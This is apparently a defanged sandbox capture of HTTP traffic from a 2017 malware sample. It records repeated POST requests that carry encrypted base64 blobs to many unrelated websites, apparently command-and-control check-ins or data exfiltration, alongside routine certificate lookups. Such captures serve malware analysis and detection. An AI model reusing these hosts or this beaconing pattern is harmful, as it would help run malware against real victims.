Host: VVV.pferd.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Date: Sat, 01 Jul 2017 11:16:38 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: hXXps://VVV.pferd.com/de-de/
Cache-Control: max-age=0
Expires: Sat, 01 Jul 2017 11:16:38 GMT
Content-Length: 291
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a
href="hXXps://VVV.pferd.com/de-de/">here</a>.</p>.<h
r>.<address>Apache/2.4.18 (Ubuntu) Server at VVV.pferd.com Po
rt 80</address>.</body></html>...


GET /tj.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: tj.symcb.com


HTTP/1.1 200 OK
Server: Apache
ETag: "51ee3eb661308e2d20e0436ed06679f0:1434417110"
Last-Modified: Tue, 16 Jun 2015 01:11:50 GMT
Content-Type: text/plain
Date: Sat, 01 Jul 2017 11:16:44 GMT
Content-Length: 1206
Connection: keep-alive
0...0..............m.0..#=...e.0...*.H........0..1.0...U....US1.0...U.
...thawte, Inc.1(0&..U....Certification Services Division1806..U.../(c
) 2006 thawte, Inc. - For authorized use only1.0...U....thawte Primary
Root CA0...131031000000Z..231030235959Z0A1.0...U....US1.0...U....thaw
te, Inc.1.0...U....thawte SSL CA - G20.."0...*.H.............0........
........Y ;D..R9...z...@.F..(...`8?...B...I....l.7o.. <m.t...$.A...
6.....S...........<.2V..N....9P.ne.....Y.H......>;. ...F.`d.u...
8.G{4.....v...&.y.6H..7..2.|.S....T8/Ou..Z.....[........tU......Fdr8.Z
.:...q..T...l..>..?!.;.~.GS...FC.K-..../..~....l...o...........;0..
70...U.......0.......0...U...........02..U... 0)0'.%.#.!hXXp://t1.symc
b.com/ThawtePCA.crl0/.. ........#0!0... .....0...hXXp://t2.symcb.com0A
..U. .:0806..`.H...E..60(0&.. .........hXXps://VVV.thawte.com/cps0)..U
..."0 ..0.1.0...U....SymantecPKI-1-5370...U.......OHW..O..]8}......R`0
...U.#..0...{[E....z.1..j..F.WHP0...*.H................C.v...#.^.c.}D.
.k..........k....,.7......p.(B..Kwj...#.VM..i......[>.<.:..l'...
.`q'.....D.H...v!....d..6?..<>...X..r.h... .R..w.qp.U5.7..M..p..
@nK}..)*.y..Lga...'.Y..U...35-^N..........t.,..M../...r|.1n.....6Q{.a.
m.#[4....1.........'2...i. .......`..&.xHTTP/1.1 200 OK..Server: Apach
e..ETag: "51ee3eb661308e2d20e0436ed06679f0:1434417110"..Last-Modified:
Tue, 16 Jun 2015 01:11:50 GMT..Content-Type: text/plain..Date: Sat, 0
1 Jul 2017 11:16:44 GMT..Content-Length: 1206..Connection: keep-alive.
.0...0..............m.0..#=...e.0...*.H........0..1.0...U....US1.0

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 428
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: guberman.com.br
Connection: Keep-Alive
Cache-Control: no-cache

BGx6LEUUu3EZHsfebHi/h75UMTkTHSdFSbXX5scPaJZYTlfUEOsKz4tCdT qMoA5CnAv LPudhDEtcwoIfxYZ3492n8P6X764q6ETueTU8dSYv6vGXL /gBJ8qWzg5j5tJdb3ApEiwNh5DJfuWV85UdXGRsWQcYXiCXmFJt7IImAR8JqQxRoRFiQsS/kdIW7jQ3Pcfl2beF88xVs9qhQb28AXBqZnbg6cTKJCB0bHTQQGclswl77k47/gCK3t04neUE XGZgfaXhjLxdJb6g6xjlBkkE1TRlZNFWDqrOuTNoVZM PGPkW7oK2iFSP6q6h2NEMIVk4hV/aDp2XSOfjyjfVKq64U6OPBZmmfSQ1B3CayZE9ILVC7OCo8ziSLSxEQBnxOxx Fue4XXNyQ/LVq/XIYgUEfftc6qfB9ToNA==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: hXXp://VVV.guberman.com.br/xmlrpc.php
Link: <hXXps://VVV.guberman.com.br/wp-json/>; rel="hXXps://api.w.org/", <hXXps://VVV.guberman.com.br/>; rel=shortlink
Set-Cookie: PHPSESSID=nlsh28m3o9hethtf3nslci1vf6; path=/
Content-Length: 107410
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>.<html class="no-js" lang="pt-BR">..<!--
head -->.<head>..<!-- meta -->.<meta charset="UTF-8
" />.<meta name="viewport" content="width=device-width, initial-
scale=1, maximum-scale=1">.<meta name="description" content="Jus
t another WordPress site" />..<link rel="shortcut icon" href="ht
tp://VVV.guberman.com.br/wp-content/uploads/2016/10/icon.png" />...
..<!-- wp_head() -->.<title>Guberman Inform..tica –
Solu....es para o setor de transporte</title>.<!-- script | d
ynamic -->.<script id="mfn-dnmc-config-js">.//<![CDATA[.wi
ndow.mfn = {mobile_init:1240,nicescroll:40,parallax:"translate3d",resp
onsive:1,retina_disable:0};.window.mfn_prettyphoto = {disable:false,di
sableMobile:false,title:false,style:"pp_default",width:0,height:0};.wi
ndow.mfn_sliders = {blog:0,clients:0,offer:0,portfolio:0,shop:0,slider
:0,testimonials:0};.//]]>.</script>.<link rel='dns-prefetc
h' href='//VVV.guberman.com.br' />.<link rel='dns-prefetch' href
='//fonts.googleapis.com' />.<link rel='dns-prefetch' href='//s.
w.org' />.<link rel="alternate" type="application/rss xml" title
="Feed para Guberman Inform..tica »" href="hXXps://VVV.guberman.
com.br/feed/" />.<link rel="alternate" type="application/rss xml
" title="Feed de coment..rios para Guberman Inform..tica »" href
="hXXps://VVV.guberman.com.br/comments/feed/" />.<link rel="alte
rnate" type="application/rss xml" title="Feed de coment..rios para

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 508
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: atr-technologies.com
Connection: Keep-Alive
Cache-Control: no-cache

BCpTtoz5qF sdnjV92cdyp80K1JkxdH1gFsHMk4DfeRFepMn9OxBpAniyWkmM2hh3gXhO8ZKAK4e0idJ1gMdDhFGBXewZWMEgXmMwcPm4fD3YU3bxEuV/irUnLlIIaQ3L4SIsgncMvzqq53IfU1l8LC7IBA5x28p/l2BowhahPHMI1KDYjVXRAtQ1u20 pQoouqlsujkuGCybA5FYcCRw4b4M1PwxklrNJv3u1Ebnwqyw/NMlcKMm4zLwQUbh8mPYWgE0nC1OYyLxx0rvsUwM0xjQO5N7FoFZWjetrnLmyetKh3ZE 6S2sz1ndefcIDyO6qdDyXdcyJrM8f1/McLIKeIYRaO9YSzRtvqGYCHbYOeRgjkgKLhFbXt9fwzDyAM4vBanFZIY3JFSLQXwE9j0euaU8EhYF7mauFWht6nDQHZZnD7RsnKHauQM3M0ffs9FCwdPVXNdy2PYBpAzGsBMKO22I3kEjMkqNd5KjRphXtYzrgEjgMkWg7rWg==
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:16:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=d7931c4c5e390183a8c947585e6f9c9c81498907800; expires=Sun, 01-Jul-18 11:16:40 GMT; path=/; domain=.atr-technologies.com; HttpOnly
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f456873e823d-KBP
111e..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 464
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: atr-technologies.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __cfduid=d7931c4c5e390183a8c947585e6f9c9c81498907800

GKj25NVpAHVM8sVqvDFsrc6QNvTjiem32dNh0l221C5UUPZwLWnynMrbQUjkuznPyxxphV35UMyYVHZjC/dEmj2W lR EGnZYd E8ycgZapeiC1SNH90Bt4dFaWoxPJtLQEt684QTxkxh3yh6jZqDS8NAsQ50YAE4bpBkFQUjXHET8oz7xp uwlEpaDt J1rMDuQxTijagcSMpbugRXUirlE3V/ngecdVQcFEWlGgtR3Jtp /YZJUDkE25WLD PJZfkmyQ8KxCgSP5bJiQOqzMnxDtO1wBJnlbpcw9tjwZPhiufwLaJe4PEb/g6uP5vke4OFG/4QsH2XPzGlqpa2sWM/XTER/XdJLI7ijxldlqqwyVxPaJqjP4NCUqW6CN1H8T9erSNlZpNYuYa2dwJn6iEoSPkD55rp5RkNAul2XojN2/7BkzskO6NR3Msq71rCjJfeETq0TQFVRbqg
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f4f2a14483f4-KBP
127c..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 432
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: manuyantralaya.com
Connection: Keep-Alive
Cache-Control: no-cache

IdE6SD2ffnReROoW9FdEJ3Y2eQBrbx2twSs2UX4 9h2xtoA9 P6ckmjnsoTFGhGVu8wvqWh9uvMAY48EI8nv28Bl2WL30MX1XSMnz6UprJ9INxE3k5sdVBc3 MJbvKInulSUZn9OLm2NrdQEqEJg2ROlIRyUy3594rJ/qnFnU2eID/tmzYr/GvyGeareMF1efxJjSy/mQwMqxPTD1gY1UESmRx8KejiRr Eu6GSZUT3/Eu5X1jA4Dllfm/NGdlzeL7wdcy140KOsvLe75vtqKbZU01FIh6dhCgkjD4OABIUvSrcuGRNk/yrStJA32kZk8lHoNepGhOR2GfVIopZpN5WCTpOKmufdG/TwbQIZVrSn8X/WMjIB5w3aIYzBa9/1WK WKv 2q3i/ATlLFskEpgoxO8FFX DMvFCtyFxFzJPU/Q==
HTTP/1.1 410 Gone
Server: nginx
Date: Sat, 01 Jul 2017 11:17:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Blocked: spam via cache
X-Status: 410 Domain blocked
0..HTTP/1.1 410 Gone..Server: nginx..Date: Sat, 01 Jul 2017 11:17:04 G
MT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked
..Connection: keep-alive..X-Check: 3c12dc4d54f8e22d666785b733b0052100c
53444..X-Blocked: spam via cache..X-Status: 410 Domain blocked..0..


GET /wp HTTP/1.1
Accept: */*
Accept-Language: en-us
Cookie: 720planBAK=R3744882117; 720plan=R1791010726
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.upsilon89.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Set-Cookie: 720plan=R1791010726; path=/; expires=Sat, 01-Jul-2017 12:24:35 GMT
Date: Sat, 01 Jul 2017 11:17:07 GMT
Server: Apache
Location: hXXp://VVV.upsilon89.com/wp/
Vary: Accept-Encoding
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
X-IPLB-Instance: 5233
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.upsilon89.com/wp/">here<
;/a>.</p>.</body></html>.
....



GET /wp/ HTTP/1.1

Accept: */*
Accept-Language: en-us
Cookie: 720planBAK=R3744882117; 720plan=R1791010726; 720plan=R1791010726
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.upsilon89.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Set-Cookie: 720plan=R1791010726; path=/; expires=Sat, 01-Jul-2017 12:24:35 GMT
Date: Sat, 01 Jul 2017 11:17:07 GMT
Server: Apache
X-Powered-By: PHP/5.4.45
Location: hXXp://upsilon89.com/wp/
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
X-IPLB-Instance: 5233
0..HTTP/1.1 301 Moved Permanently..Set-Cookie: 720plan=R1791010726; pa
th=/; expires=Sat, 01-Jul-2017 12:24:35 GMT..Date: Sat, 01 Jul 2017 11
:17:07 GMT..Server: Apache..X-Powered-By: PHP/5.4.45..Location: http:/
/upsilon89.com/wp/..Vary: Accept-Encoding..Transfer-Encoding: chunked.
.Content-Type: text/html; charset=UTF-8..X-IPLB-Instance: 5233..0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 468
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: choice-select.com
Connection: Keep-Alive
Cache-Control: no-cache

nLRjd4PPE29Y iX0iq/pCKw4n MptMr3Z7VcJfdY89pfbeICcv6zGqNIUhSTvdHA515EZtfx8IJK8li5b6Qnaj/p8R4ZVWLF/5tHgmk0RQMNYkwulEh5ldhnl7vopcPULpxRW6mtiPJjT1mZa7RBbG fAxDmt0kOop5CgKvmChOUeYVkJeiEapMDa H1VqXhyZxxy vlpF5P9Pk6kc4wGRzlN/iZB1O/h6fGSAtEdDmnMhgnDUcVjqwMyl9FZblr5xaxMZwI5b wTA406QR2S/L0qrVyeEGJpm 4UYoP9Rd0hkvaJRZg9vrWYFpd6Ju0LBhk5nSRNH9QgKI/6y1ML0gKeHsMcymexV36Mro1M3dsQURocwj j0vuTLw7vx Nriig75B/EmUqS43yUgM0eJKtLS8YrWuirx6lKHOnNzU7JP3tawW21C/hoecZvNo vaFO/KIdPF7t/T70pbxg
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Sat, 01 Jul 2017 11:16:58 GMT
Content-Type: application/octet-stream
Content-Length: 116
Connection: keep-alive
Content-Type: text/html
<html><head><title>choice-select.com</title>&l
t;/head><body><h1>choice-select.com</h1><p>
Coming soon.</p></body></html>HTTP/1.1 200 OK..Serve
r: nginx/1.10.2..Date: Sat, 01 Jul 2017 11:16:58 GMT..Content-Type: ap
plication/octet-stream..Content-Length: 116..Connection: keep-alive..C
ontent-Type: text/html..<html><head><title>choice-se
lect.com</title></head><body><h1>choice-select
.com</h1><p>Coming soon.</p></body></html&g
t;..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 504
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: celebikalip.com.tr
Connection: Keep-Alive
Cache-Control: no-cache

DfNK7fhxN3P5Hw2Le4zgTuuHH3pAlD0TrAxvi2q75 cVwMG eL0jYzkJi/TVcLpzTGzJzxEC3NS/x7Q KCxOvcGloR9Tu6GAbu/NOkva4/ YjKbFz0nRPwqu9LIVMCDxDaSdwedxcparteXX0mOBo05piycqRqp1LnB92QVvl0iCnqH8wR55dZSguZH1mWYS6t/qSFvpl4MjpQl3879sD3hn4MvdNtLdW6kzVVsK9nYgUITGh1yYRWsdi3Y 6l BArajDu7hc3TLrvb9n1nX1Al T7Zv0pAgHh9VEqiCErHTfakBImfGCRCqLTXpj/aVKMofFPa2n6D5z03EPvRVjIu5FSTfpx22N VTvzyYwQVAmxKzKCsU7GaWqh1YfT3eavf5P/Q2qnmyY5I4fKYd bu3kCDfaSsm6lOrReqFah4TL0lRbThTMfrEXFJPptUQCA2LTSoABtZlSVjkPqVu/jNimPv4 e7Se/nk/VbFelYAbVnofMem1Bk=
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20477
Content-Type: text/html; Charset=windows-1254
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDCQDCRCAR=OPFGJEEDJNGONDPPLMMALMNA; path=/
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Sat, 01 Jul 2017 11:16:20 GMT
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
ttp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html
xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir
="ltr" >..<meta http-equiv="X-UA-Compatible" content="IE=7"/>
..<head>...<meta http-equiv="Content-Type" content="text/html
; charset=windows-1254" />...<meta http-equiv="Content-Type" con
tent="text/html; charset=iso-8859-9" />...<meta http-equiv="Cont
ent-Language" content="tr" />......<TITLE>D.zce .elebi Kal.p&
lt;/TITLE>....<meta name="keywords" content=",">....<meta
name="description" content=" ">....<META content="Copyright . 20
11 D.zce .elebi Kal.p" http-equiv=Copyright>....<META content=no
-cache http-equiv=cache-control>....<META content=no-cache http-
equiv=pragma>....<META name=Author content="D.zce .elebi Kal.p"&
gt;....<META name=robots content=all>....<META content=noarch
ive meta="robots">....<META name=googlebot content=noarchive>
....<META name=language content=tr>....<META name=revisit-aft
er content="1 days">....<META name=document-state content=dynami
c>....<META name=keywords content="D.zce .elebi Kal.p">....&l
t;META name=description content="D.zce .elebi Kal.p Resmi Web Sitesi"&
gt;....<script type="text/javascript" src="site_acilis_efekti/jquer
y-1.4.1.min.js"></script>....<script type="text/javascript
" src="site_acilis_efekti/custom.js"></script>....<LIN

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 472
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: automa.it
Connection: Keep-Alive
Cache-Control: no-cache

S0XrxtneAncMkD4P6LqPL3JAwx43TQ4WHf9AoH9FK53yTYc9Pwc2LtcWgD eoX6tjk7mhEZ51E79xecqhaOKGw93PArmStqGF7mKMcLXH9QFVmeoRrk5ZppAsraguSkUPgqToi5BQqDGsD/aC4WxhSpy/oS/zVS7WarSuCA5 RxSd8FSsXnsepDxrd pCEvdSFyclcAFayFgZXmqntW6rBNlfW0SQ6uGEBdf0fjcvYVrTEQFTW3Rnz8rqr8wkl4hq1nEJ/YihucD8A7aSncppiqqd25wY1BkzutKXa5u3cdCO4MhM 080CS6g6mKdVrn6zSR/JlYEEVos8abpib NNU8MKX1FVkvf5711wypSyKAEZ2KIKIw/AUkvCdgzwsdMs3JDSKtwcMukWOTp4roda2KLXWslYCY0QFxsoMXAdYMp58d8UXnUwdttokAevBS1eF0n4qtEcZ3geJMcgu sGg=
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 01 Jul 2017 11:16:38 GMT
Connection: close
Content-Length: 315
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org
/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Not Fo
und</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/ht
ml; charset=us-ascii"></HEAD>..<BODY><h2>Not Foun
d</h2>..<hr><p>HTTP Error 404. The requested resourc
e is not found.</p>..</BODY></HTML>....


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: yamamoto-sr.com
Connection: Keep-Alive
Cache-Control: no-cache

pQQqKghdvV i975FS9zloXtxgZqQBO7vvJj1BCUcy5/EL0ZFLSK77LezzolkNMAJdjWpT7Qy4 rDQUtgBG21pmQIvcV XHAdiFU2SECQQ4vYo 8MVLWMCrNjHxYx3ZGah8OE8eYwHfa/2A5OI/TMay3bg0Lk0vkwSu3mtyNlujz7Pio7OCqMy6tWbhOhTLDdUpU2KHFDaoatkhn5vrBZ1uWpLEtKubzMDihs4P8QrcakuryvIyMQS4xvxtiPt1synshY0E5TjVe7JsPvXU89TG0EI7Yym NjnacelIIPuzKaLd6f GQZkSHaQGSL6ef6MRp8LyFSOUs  kpiM10lxUa7rvshm/75bP6wTQc7z2dOOytW3lOT4FcgfV5asXAqACAKVpHODoZBAmCF4QGv2sYnIwyAnHgqqIugHtzHIxa8ABrPoKmcNtE0As13L849FytVFoZ9/aMJVlyIGtiCEMwgSncSuhXPJ11nykb1Z7afanH2N07e/2hp/8oQYw==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:40 GMT
Server: Apache/2.2.31
Last-Modified: Thu, 29 Jun 2017 15:32:24 GMT
ETag: "eb5b592-3c80-5531b01dc7200"
Accept-Ranges: bytes
Content-Length: 15488
Keep-Alive: timeout=5, max=20
Connection: Keep-Alive
Content-Type: text/html
<!doctype html>.<html lang="ja">.<head>.<meta cha
rset="utf-8">.<meta http-equiv="X-UA-Compatible" content="IE=edg
e">.<!--<meta name="viewport" content="width=1200, user-scala
ble=yes">-->.<meta name="viewport" content="width=device-widt
h, initial-scale=1.0">.<title>...............................
................................... .................................&
lt;/title>..<meta name="keywords" content=".....................
,............,........." />.<meta name="description" content="..
....................................................... ..............
......................................................................
............................................................... ......
..................... ..................">.<!-- End keywords & D
escription -->..<!-- Favicon -->.<!--<link rel="shortcu
t icon" href="fav-ico.png" type="image/x-icon" />-->.<!-- End
favicon -->..<!-- Css -->.<link rel="stylesheet" type="te
xt/css" href="css/default.css">.<link rel="stylesheet" type="tex
t/css" href="css/library.css">.<link rel="stylesheet" type="text
/css" href="style.css">.<link rel="stylesheet" type="text/css" h
ref="css/owl.carousel.css">.<link rel="stylesheet" type="text/cs
s" href="css/owl.theme.css">.<!-- End css style -->..<scri
pt type="text/javascript">.function MM_swapImgRestore() { //v3.0.
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oS

<<< skipped >>>

GET /gsdomainvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBTR8bV2+e7AwQ96/HwxJKnDYl18YQQU6k581IAt5RWBhiaMgm3AmKTPlw8CDB2guvyx+pkX+CnAFA== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:04 GMT
Content-Type: application/ocsp-response
Content-Length: 1558
Connection: keep-alive
Set-Cookie: __cfduid=d5550fc1e1bf82c78e90dc57eb64a479d1498907823; expires=Sun, 01-Jul-18 11:17:03 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Sat, 01 Jul 2017 10:58:13 GMT
Expires: Wed, 05 Jul 2017 10:58:13 GMT
ETag: "c25872e85a7dcd0571d8e7c259ed6b1fb4c740db"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: EXPIRED
Server: cloudflare-nginx
CF-RAY: 3778f4ebb6518448-KBP
0..........0..... .....0......0...0......2......w.}.-..V.:_Ni..2017070
1105813Z0o0m0E0... ...........v.....z.|1$..b]|a...N|..-....&..m.......
..........)......20170701105813Z....20170705105813Z0...*.H............
..u!"sI....N.?=T......).,.<. ".?.....L...U8.......V......:...>.}
.1.).c.-`n..Byq..?...u..............<|.m....9.v...?.:%.fv..C...B7.8
..^?.e......M....e[....K.?......Z_B%L...d.K..h.2...K...|..Y..&.'.Q7...
..h...g=b'......._.......E.........}......|8....b...>4l....?0..;0..
70..........O.N:... R."i0...*.H........0`1.0...U....BE1.0...U....Globa
lSign nv-sa1604..U...-GlobalSign Domain Validation CA - SHA256 - G20..
.170504081212Z..170804081212Z0..1.0...U....BE1.0...U....GlobalSign nv-
sa1.0...U....2017050400191G0E..U...>GlobalSign Domain Validation CA
- SHA256 - G2 - OCSP Responder0.."0...*.H.............0.............F
..::{...pL...a_'3..'....|.......U...............).....2Y._....&..X.J..
.v...8":k.6..=...t...~...Q.............nz...l..n@.}.7.....4.%....m.eUR
..........t..>......O9...@...zy....Zu...(..~.(..NK.......gW .L..*..
...6.(..=....^.......WX#>y$o....!.^..l4..fi........0..0...U......2.
.....w.}.-..V.:_Ni0...U.#..0....N|..-....&..m......0... .....0......0L
..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com/repos
itory/0...U...........0...U.%..0... .......0...*.H.............9"K....
>....n..bk.).uPc/..|sGW.7.YA..6T.....hd.F.:a0.}.'|;.0.1T.......-A..
.e.......%.K......%.....C.......Y..l6..U..{/.v.D.... .... ."....z@[C..
.ck.^...Rx..o[.|B..}}D>.y.tA\.m.&....904!..... Kk ..F. ......0p

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 508
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: vanguardpkg.com
Connection: Keep-Alive
Cache-Control: no-cache

7iGm4uRtAl7oqXc9f1 btbemSLycvIXTWOlGEN51NQQ vq53uy19MJvn6hWRtOhqlrpAzpl996xulykYTi5TLMvTEKwFWzVOlSBfRs/OAs8m5j BN6Z3M4KlAI8TPh2 Jz9VZsgu6q3aI0lWOYGezFOvdTVxZRmoyNxEGQ8AzPG nYRIE8KEjk6qZxxP0AMqXdlXz5cfUp0dIVC2uRikZbyj3z88y8Q2QSpUhu3KxNKltntPDNO9Tik3mc79pfE206oZGor Z9M/JnuGSaAD/H/RZDP8WB05iJ8PQI0HxBvXAP5myZ7ctVS6OJpkj/jnmHvj1GKxgd3SYbkli9j7I5t jBMZe4BsCNypKV6N Qm/zvYmQpsaMSvAw/XJ5JEG9KqMJVP08y3eo dJcagHhah/rCc2edvW2ecI4w5wTWSzgJ1zv2P1wr5vhmZn/oYWQiH00svaT 9VA89msaE4A15/ZYF Fq4CUAE YlFKHB02XSDIgaABTzvkwQ==
HTTP/1.1 302 Found
Date: Sat, 01 Jul 2017 11:16:38 GMT
Server: Apache
Location: hXXps://VVV.vanguardpkg.com/
Content-Length: 277
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a
href="hXXps://VVV.vanguardpkg.com/">here</a>.</p>.<h
r>.<address>Apache Server at vanguardpkg.com Port 80</addr
ess>.</body></html>.HTTP/1.1 302 Found..Date: Sat, 01 J
ul 2017 11:16:38 GMT..Server: Apache..Location: hXXps://VVV.vanguardpk
